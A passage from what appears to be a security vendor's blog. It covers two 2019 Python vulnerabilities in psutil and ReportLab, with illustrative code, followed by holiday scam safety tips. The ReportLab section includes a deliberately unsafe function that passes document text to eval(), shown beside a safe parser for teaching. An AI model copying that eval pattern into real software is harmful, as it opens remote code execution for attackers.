  • Where does it live? 
  • How is it stored?
  • How is it protected?
  • Are these protections sufficient?

Therefore, when new technologies are put in place, there can also be a focus on whether:

  • The technologies are fully supported
  • The technologies are deployed across the organisation’s entire enterprise
  • The technologies have no capacity limits
  • The technologies are continuously monitored

Both patient care and business continuity are important to healthcare organisations. As hospitals and caregivers rely on technology to deliver more timely care and more efficient business processes, they must ensure their systems are secure and stable for everyday operations. This requires a cyber resilient approach that addresses people and processes, as well as the technology used. Read Meterian’s blog post on how your organisation can become more cyber resilient.


New Python Vulnerabilities!

Image of thief climbing out of laptop shining flashlight on Python icon, titled Vulnerability Focus: Python.

In honour of Meterian introducing Python into their beta production, here are two Python vulnerabilities which you should look out for. We don’t like it when systems or computers behave in unexpected ways. It’s worse when such outcomes result in a cyber security incident. This month’s Python vulnerabilities can cause unexpected behaviours which hackers could exploit to compromise the integrity of your system in unpredictable ways. Don’t waste any time as you could be affected, so read on and learn how to avoid these risks.

  • CVE-2019-18874: python-psutil through version 5.6.5 contains a double free. Attackers could use this issue to cause psutil to crash, resulting in a denial of service, and possibly to execute arbitrary code.
  • CVE-2019-17626: ReportLab through 3.5.31 allows remote code execution because of toColor(eval(arg)) in colors.py. This vulnerability could affect confidentiality, integrity, and availability within your software/network.

CVE-2019-18874

Vulnerability Score: 7.5 / HIGH

Platform: Python

Component: python-psutil

Affected Versions: up to 5.6.5 inclusive

Indeed… Python has a vulnerability within the package python-psutil. It was discovered on 11th November 2019 by Riccardo Schirone, who noticed that psutil incorrectly handled certain reference counting operations.

python-psutil is a Python package which provides convenient functions for accessing system process data. It is a cross-platform library for retrieving information on running processes and system utilization in Python. It is mainly used for system monitoring, profiling, limiting process resources and managing running processes. psutil supports a range of platforms: Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Sun Solaris and AIX.

How does this vulnerability happen? It was caused by incorrect reference counting within the for/while loops that convert system data into Python objects. If an error occurred, the reference count was dropped twice, so the system’s memory was mishandled: a double free releases the same area of memory twice.

How can hackers take advantage of the system? They could use this vulnerability to cause the psutil program to crash, which could lead to a denial of service and potentially the execution of arbitrary code. Arbitrary code execution gives the attacker the ability to run any command of their choice on a target machine or process. Like landmines, this vulnerability is unpredictable and hard to spot. The idea is that the hacker is waiting for the system to trip up in order for the “landmine” (malicious code) to go off and infect the user’s system.
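The two paragraphs above describe the bug class in words: a loop builds a Python object per record, hands it to a result list, and drops its own reference; if a later record fails, the error path drops the same reference again. The following is an added illustration written for this post, not psutil’s own source (which is C extension code using Py_DECREF/Py_XDECREF). It models that C pattern with a toy reference-counted object so the double release can be observed instead of corrupting the heap, and shows the hardened form, which clears the stale pointer after the hand-over (the Py_CLEAR idiom) so the error path has nothing left to release. The record loop, the failure injection and the counter are all constructed for the example.

```python
class RefObj:
    """Toy stand-in for a C-level PyObject with a manual reference count.
    Constructed for this example; it is not psutil code."""

    double_releases = 0  # releases of an object whose count already hit zero

    def __init__(self):
        self.refcnt = 1          # a freshly built object is owned by its creator
        self.released = False

    def decref(self):
        """Py_DECREF: drop one reference; the object dies at zero.
        A decref on an already-dead object is the double free."""
        if self.released:
            RefObj.double_releases += 1
            return
        self.refcnt -= 1
        if self.refcnt == 0:
            self.released = True


def xdecref(obj):
    """Py_XDECREF: like decref but tolerates None."""
    if obj is not None:
        obj.decref()


def convert_records(n, fail_at=-1, hardened=False):
    """Model of a C loop that turns n system records into Python objects and
    appends them to a result list. fail_at is the record whose conversion
    fails (-1 for none), mirroring an allocation error that jumps to the
    C 'error:' label. Returns how many double releases happened."""
    RefObj.double_releases = 0
    result = []
    item = None
    try:
        for i in range(n):
            if i == fail_at:
                raise MemoryError("simulated conversion failure for record %d" % i)
            item = RefObj()
            result.append(item)
            item.refcnt += 1      # PyList_Append takes its own reference
            item.decref()         # Py_DECREF: the list is now the sole owner
            if hardened:
                item = None       # Py_CLEAR-style: no stale pointer for the error path
    except MemoryError:
        # 'error:' label: meant to free a half-built item, but in the buggy
        # form 'item' still points at the object the list already owns.
        xdecref(item)
    for obj in result:            # dropping the result list releases its members
        obj.decref()
    return RefObj.double_releases


if __name__ == "__main__":
    print("no failure, buggy loop:   ", convert_records(4))                          # 0
    print("failure at 2, buggy loop: ", convert_records(4, fail_at=2))               # 1
    print("failure at 2, hardened:   ", convert_records(4, fail_at=2, hardened=True))  # 0
```

The point for reviewers of native extension code is that the error path is only correct if every pointer it releases is either live or NULL; clearing a pointer immediately after ownership is transferred is what makes the single cleanup label safe for every exit from the loop.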


To remedy this vulnerability, please upgrade to version 5.6.6 or higher of python-psutil. Upgrade fast Python users, you don’t want to be at risk of a cyber attack.

CVE-2019-17626

Vulnerability Score: 9.8 / CRITICAL

Platform: Python

Component: reportlab 

Affected Versions: up to 3.5.31 inclusive

Yes that’s right! We have one more Python vulnerability to inform you about. This one is found within ReportLab up to 3.5.31, and it allows remote code execution because of toColor(eval(arg)) in colors.py. The vulnerability was found on 10th October 2019 and has been classified as critical. The issue affects the function toColor in the file colors.py.

The ReportLab issue tracker entry showing the affected lines of code: https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code

ReportLab is an open source engine for creating data-driven PDF documents and custom vector graphics. It is free and open-source, and widely used to generate reports in Python. The package sees more than 50,000 downloads per month, is embedded in many products and was even selected to power the print/export feature for Wikipedia. So you can understand why this vulnerability is critical and urgently needs to be fixed by users.

The issue with this vulnerability is that manipulation of the input value to <span color="…"> can lead to a privilege escalation vulnerability. Not only can this attack be initiated remotely, but it impacts a user’s confidentiality, integrity and availability. To make matters worse, the price of this exploit has been estimated at around USD $0-$5k (as stated on 16/10/19).
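To make the eval injection concrete, here is an added example written for this post; it is not ReportLab’s code and does not show the project’s own fix. The unsafe function reproduces the pattern named in the advisory (the attribute value is passed to eval()), and the safe function beside it is one way to do the same job without evaluation: an allow-list parser that accepts only a named colour, a “#rrggbb” value or “rgb(r, g, b)” and rejects everything else. The colour table, the regular expressions, the markup extractor and the sample document are all constructed for the example.

```python
import re

# Allow-listed colour names, constructed for this example (a real parser would
# carry the full table of named colours).
NAMED_COLORS = {
    "black": (0, 0, 0),
    "white": (255, 255, 255),
    "red": (255, 0, 0),
    "green": (0, 128, 0),
    "blue": (0, 0, 255),
}

HEX_RE = re.compile(r"^#([0-9a-f]{6})$")
RGB_RE = re.compile(r"^rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)$")


def unsafe_to_color(arg):
    """The CVE-2019-17626 pattern: the attribute value is handed to eval(),
    so any Python expression in the document is executed. Shown for contrast."""
    return eval(arg)  # intentionally unsafe


def safe_to_color(arg):
    """Allow-list parser: returns an (r, g, b) tuple for a named colour,
    '#rrggbb' or 'rgb(r, g, b)', and raises ValueError for anything else.
    Nothing is ever evaluated."""
    text = arg.strip().lower()
    if text in NAMED_COLORS:
        return NAMED_COLORS[text]
    m = HEX_RE.match(text)
    if m:
        h = m.group(1)
        return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))
    m = RGB_RE.match(text)
    if m:
        rgb = tuple(int(v) for v in m.groups())
        if all(0 <= c <= 255 for c in rgb):
            return rgb
    raise ValueError("not a colour: %r" % arg)


def is_rejected(arg):
    """True when the safe parser refuses the value; used to check inputs that
    are not colours but that eval() would run."""
    try:
        safe_to_color(arg)
    except ValueError:
        return True
    return False


def extract_span_color(markup):
    """Pull the color attribute out of a <span color="..."> tag in user-supplied
    paragraph markup, the path through which untrusted text reaches toColor()."""
    m = re.search(r'<span\s+color="([^"]*)"', markup)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed sample: the colour attribute is a Python expression, not a colour.
    doc = 'Total: <span color="len(\'hello\')">5</span>'
    value = extract_span_color(doc)
    print("eval-based toColor returned:", unsafe_to_color(value))  # 5: code ran
    print("allow-list parser rejected it:", is_rejected(value))    # True
    print("a real colour still parses:", safe_to_color("#ff0000"))  # (255, 0, 0)
```

The harmless probe len('hello') is enough to show the difference: the eval-based version returns 5 because it ran the expression, while the allow-list parser raises because the string is not a colour. Any code path that turns document text into a value should be a parser with a closed grammar, never an evaluator.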


To remedy this vulnerability, please upgrade to version 3.5.32 or higher. This is different from the recommendation of NVD, which suggests upgrading to version 3.5.26 or higher. NVD also references the incorrect CWE, which should be corrected to CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’). Based on Meterian’s analysis, we only see the remediation implemented in versions 3.5.32 or later. You can verify the code here

Spread the word on these critically-rated, easy-to-exploit Python vulnerabilities in order to help the app sec community defend against unwanted exploits. But as you all know, open-source vulnerabilities are discovered daily, so you can expect us to be back with new vulnerabilities very soon!

Knowing is half the battle. The other half is doing. Let Meterian help your dev team stay in the know and on top of the latest updates to secure your apps continuously. Sign up here to download the Meterian client today. You’ll get an instant analysis of your first project for free. See the risks immediately and know which components to remove or upgrade to secure your app.


TOP 10 HOLIDAY HACKS

Beware: ’Tis the season to be scamming

Busy area of people with a Christmas tree in the centre. A thought bubble coming out of a parent saying "How was it seeing Santa?". Another thought bubble coming out of the child next to the parent saying "He asked me lots of questions...I think he might be a cyber criminal...".

Why is the Holiday season so popular for cyber criminals?

Organizations and individuals are at a much higher risk of suffering a cyber attack during this festive season. TAU’s 2018 Carbon Black Holiday Threat Report showed how during the winter holidays, there was a significant increase in cyber attacks. A survey conducted by Tufin Technologies similarly stated that 81% of hackers said they operated more intensely during the winter vacation. But why is this the case?

The total value of global retail e-commerce sales will reach $3.54 trillion by the end of 2019, up 20% over 2018. To top that off, nearly $142 billion (£106.5 billion) will be spent online in the UK during the holiday season this year. With so many people spending online, this becomes a goldmine for hackers to target those of us who shop online.

Additionally, with offices empty during the festive season, this is an ideal opportunity for criminals to start causing havoc to your business. Even the lead-up to the Christmas break can be a vulnerable period, as your staff become more and more distracted. This lack of vigilance lets hackers attack and get away with it; the Tufin Technologies survey found that 56% of hackers said Christmas was the best time to hack corporate computers.

The rise of emails sent during the holiday season means phishing emails are harder to spot. According to Responsys’ Retail Email Guide to the Holiday Season, 89% of top retailers increased their number of promotional emails sent in November and December by 47% compared to January and October. 

10 hacks to fight back: Don’t let hackers ruin your festive fun!

  1. Missing parcel fraud 

Have you ever received a card saying a parcel has been left on your porch but there is nothing there? You could be a victim of a scam. One of your shopping accounts might have been hacked allowing the hacker to spend freely using your credit card details.

What to do?

To tackle this scenario, call your bank so that they can freeze any further movement out of your account. You might not have done anything wrong for your card details to be stolen, but acting fast as soon as you notice something suspicious is the best thing you can do.

  2. Fake ‘missed you’ delivery card

Most of us have received a ‘missed you’ delivery card when we weren’t at home to sign for a parcel. However, beware! Fraudsters have been known to print a similar card and make it look as though it came from the Royal Mail. It carries a fake number which you are asked to call to arrange redelivery. On the other end of the phone is the cyber criminal, waiting to collect your personal information so that they can then impersonate you.

What to do?

Never give your personal information over the phone, however reliable the caller may seem. Always look up the Royal Mail number online to check that it matches the number on the card you have received.

  3. ‘Trojan horse’ malware attack

Malware attacks occur when people click on pop-up windows that appear on their computers offering free security software. The pop-up has most likely been planted by a hacker. Once installed, the malware will harvest your personal and financial information, send phishing emails to your contacts and give the attacker remote access to your device.

What to do?

If you are unfortunate enough to install malware, you should:

  • Disconnect from the internet, which prevents any more data from reaching the malware server.
  • Enter safe mode, which starts your computer with only the minimum required software and programs and so prevents the malware from loading automatically.
  • Avoid logging into accounts during malware removal, so that no personal information is exposed.
  • Check your activity monitor to see which processes are running on your computer and how they are affecting its performance.

  4. Man-in-the-middle harvesting

Using public Wi-Fi is a risk. This involves hackers sending out their own copy-cat Wi-Fi signal which you might latch onto by accident. If you do this, it could allow a hacker to spy on what you are doing and then be able to take your personal information.

What to do?

The main advice is not to use public Wi-Fi when making payments or logging into personal accounts; otherwise you could be at risk of identity or card theft.

  5. ‘Phishing’ emails

According to NTT Security’s quarterly Threat Intelligence Report, phishing emails are up 74%, with over 1.4 million new phishing sites created each month. Phishing emails often carry malware as attachments. TAU’s report says that the majority of cyber attacks during the holidays use phishing or spear-phishing campaigns to deliver malware to the victim’s computer systems.

What to do?

If you have clicked on an attachment within a phishing email, this is what you should do:

  • Disconnect from the internet
  • Back up your data
  • Scan your device for malware using anti-malware software
  • Change all your login credentials, as once cyber criminals have them they can access all your accounts
  • Set up a fraud alert

  6. Charity donation cheats

Fraudsters also take advantage of the goodwill of many people by pretending to be charity organizations. 

What to do?

Make sure to check any emailed details with the Charity Commission’s list to ensure your donations are going to the right place.

  7. Password theft

Many people don’t know that once a hacker has access to one of your passwords they can unlock many accounts online. Over Christmas fewer people are keeping tabs on where their money is coming and going, so make sure to be cautious for any suspicious activity.

What to do?

To avoid password theft you should try to:

  • Create strong passwords – use letters, numbers and symbols
  • Use multi-factor authentication 
  • Have different passwords for different accounts 
  • Use a password manager
  • Avoid sharing your password with anyone

If your password is stolen take the appropriate action in regards to the account affected and make sure you change your account passwords immediately. 

  8. Copy-cat websites

Don’t be fooled by bogus websites. They might seem legitimate but you might fall in the trap of paying for services or gifts you will never receive. 

What to do?

You can spot these fake websites by the final suffix letters. Fraudsters in the past have used suffixes such as ‘.co.com’ instead of ‘.co.uk’. Moreover, an ‘https’ prefix is more reliable than an ‘http’ address. Website addresses with ‘https’ indicate the site has an extra layer of security: it uses the Secure Sockets Layer (SSL) to protect data and transactions on the web with an encrypted channel between your device and the website you’re shopping on.

This way, your account login, credit card and any other sensitive details are encrypted to prevent eavesdropping. In short, avoid any site where the browser shows a ‘Not Secure’ warning.

  9. Dark web targets

Over this festive season people often send seasonal greetings via email rather than cards in the post. Occasionally, there will be attachments with holiday messages. However, beware of opening these attachments even if you recognise the name of the sender. Hackers have used personal details of people off the dark web to find targets. 

What to do?

Sometimes it is better to be safe than sorry. Due to the high risk of email attachments with malware, it might be best to abstain from clicking. Thanking the sender of the email for the seasonal greetings (before you have opened any attachment) could also make it clear whether they were the true sender or not, giving you more of an indication if the attachment is safe to open.

  10. Rip-off Goods

Although you might think you have used a reputable website to do your Christmas shopping, this still does not mean you have escaped the cyber criminals. There is still a chance you could be sent counterfeit goods. This is a real problem: the European Union Intellectual Property Office (EUIPO) reported that international trade in counterfeit products is now worth up to £300 billion, and in 2017, 15,000 online shoppers lost £11 million to scams.

There are many risks when buying counterfeit goods:

  • Not only are the products of bad quality, but they are most likely unsafe (especially electrical or medical products, which could be fatal)
  • The websites used for the purchase might gain access to sensitive personal information (such as card credentials) and expose your computer to malware and viruses.

What to do?

There are a few ways you can avoid this:

  • If the price online looks really low, you could be buying a rip-off. What might seem like a good deal might be a waste of your time and money.
  • Check the spelling and grammar of the website and the URL
  • Only use sites that are reputable: always make comparisons on different sites/forums that might say the website is fake
  • Watch out for pop-ups appearing asking you to confirm your card details before you are on the payment stage. 
  • Make sure you’ve installed the latest software & app updates

To wrap it all up

There are a lot of ways which you can avoid being hacked this Christmas. But if you are one of the unlucky ones, we hope our tips have helped you deal with the situation or informed you more on the matter.
